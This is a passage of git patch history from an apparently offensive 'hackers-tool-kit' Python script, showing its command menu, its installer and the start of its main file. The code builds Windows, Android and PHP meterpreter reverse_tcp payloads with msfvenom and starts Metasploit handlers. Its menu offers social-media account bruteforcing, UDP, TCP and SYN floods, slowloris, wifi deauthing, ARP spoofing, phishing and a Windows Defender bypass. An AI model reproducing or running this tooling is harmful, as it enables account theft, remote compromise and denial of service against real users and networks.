raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 111470b11a0b2eb8c56025bdaf0fabb627e64f1d Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 18 May 2019 20:10:59 +0100 Subject: [PATCH 132/214] Delete install.py --- install.py | 107 ----------------------------------------------------- 1 file changed, 107 deletions(-) delete mode 100644 install.py diff --git a/install.py b/install.py deleted file mode 100644 index 456e1fa..0000000 --- a/install.py +++ /dev/null @@ -1,107 +0,0 @@ -import sys -import os - -def install(): - os.system("apt install dirb") - os.system("apt install sslstrip") - os.system("apt install bettercap") - os.system("apt install sslscan") - os.system("apt install crunch") - os.system("apt install tcpdump") - os.system("apt install macchanger") - os.system("apt install wafw00f") - os.system("apt install medusa") - os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") - os.system("cd /root && git clone https://github.com/1N3/BruteX") - os.system("cd /root/BruteX && ./install.sh") - os.system("apt update") - os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") - os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") - os.system("pip install whois") - os.system("pip install builtwith") - os.system("pip install colorama") - os.system("pip install dnspython") - os.system("pip install shodan") - os.system("apt install python-socks -y") - os.system("apt install nmap -y") - os.system("apt install php -y") - os.system("apt install perl -y") - os.system("apt install hashcat -y") - os.system("apt install nc") - os.system("apt install neofetch") - os.system("apt install cupp") - os.system("gem install lolcat") - os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") - os.system("cd /root/kali-anonsurf && ./installer.sh") - print "\n" - print """entering big download region prepare you anus - if your not ready press ctrl C """ - i = raw_input("press ctrl c to stop hit enter to continue") - os.system("apt install metasploit-framework -y") - os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") - os.system("apt install wifite -y") - os.system("apt install reaver -y") - os.system("apt install aircrack-ng -y") - os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") - os.system("python /root/social-engineer-toolkit/setup.py install") - - - -print "are you running on the real kali linux os [y/n]" -check = raw_input("[y/n]> ") -if check == "y" : - print "ok most tools should work for you you might have to install other" - print "things on your os for this to work if it doesnt work" - os.system("sleep 2") - install() - -if check == "n" : - print "then some of the tools in this script might not work" - print "do you want to continue installation [y/n]" - install = raw_input("[y/n]> ") - if install == "y" : - def install(): - os.system("apt install dirb") - os.system("apt install sslstrip") - os.system("apt install bettercap") - os.system("apt install sslscan") - os.system("apt install crunch") - os.system("apt install tcpdump") - os.system("apt install macchanger") - os.system("apt install wafw00f") - os.system("apt install medusa") - os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") - os.system("cd /root && git clone https://github.com/1N3/BruteX") - os.system("cd /root/BruteX && ./install.sh") - os.system("apt update") - os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") - os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") - os.system("pip install whois") - os.system("pip install builtwith") - os.system("apt install python-socks -y") - os.system("apt install nmap -y") - os.system("apt install php -y") - os.system("apt install perl -y") - os.system("apt install hashcat") - os.system("apt install nc") - os.system("apt install neofetch") - os.system("apt install cupp") - os.system("gem install lolcat") - os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") - os.system("cd /root/kali-anonsurf && ./installer.sh") - print "\n" - print """entering big download region prepare you anus - if your not ready press ctrl C """ - i = raw_input("press ctrl c to stop hit enter to continue") - os.system("apt install metasploit-framework -y") - os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") - os.system("apt install wifite -y") - os.system("apt install reaver -y") - os.system("apt install aircrack-ng -y") - os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") - os.system("python /root/social-engineer-toolkit/setup.py install") - - install() - if install == "n" : - print "thanks for checking out my script" - sys.exit() From 183c3d67923b270745d6719da5a29672fc9e64ad Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 18 May 2019 20:11:20 +0100 Subject: [PATCH 133/214] Add files via upload --- install.py | 45 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 install.py diff --git a/install.py b/install.py new file mode 100644 index 0000000..7cc82be --- /dev/null +++ b/install.py @@ -0,0 +1,45 @@ +import os +def install(): + os.system("apt install dirb -y") + os.system("apt install sslstrip -y") + os.system("apt install bettercap -y") + os.system("apt install sslscan -y") + os.system("apt install crunch -y") + os.system("apt install tcpdump -y") + os.system("apt install macchanger -y") + os.system("apt install wafw00f -y") + os.system("apt install medusa -y") + os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") + os.system("cd /root && git clone https://github.com/1N3/BruteX") + os.system("cd /root/BruteX && ./install.sh") + os.system("apt update") + os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") + os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") + os.system("pip install whois") + os.system("pip install builtwith") + os.system("pip install colorama") + os.system("pip install dnspython") + os.system("pip install shodan") + os.system("apt install python-socks -y") + os.system("apt install nmap -y") + os.system("apt install php -y") + os.system("apt install perl -y") + os.system("apt install hashcat -y") + os.system("apt install nc -y") + os.system("apt install neofetch -y") + os.system("apt install cupp -y") + os.system("gem install lolcat") + os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") + os.system("cd /root/kali-anonsurf && ./installer.sh") + print "\n" + print """entering big download region prepare you anus + if your not ready press ctrl C """ + i = raw_input("press ctrl c to stop hit enter to continue") + os.system("apt install metasploit-framework -y") + os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") + os.system("apt install wifite -y") + os.system("apt install reaver -y") + os.system("apt install aircrack-ng -y") + os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") + os.system("python /root/social-engineer-toolkit/setup.py install") +install() From 9f39838aeab6b0513616e85993da88d1c5ce9810 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 19 May 2019 23:47:59 +0100 Subject: [PATCH 134/214] Delete htk.py --- htk.py | 2780 -------------------------------------------------------- 1 file changed, 2780 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index a86412b..0000000 --- a/htk.py +++ /dev/null @@ -1,2780 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """\033[91m -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,8) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - 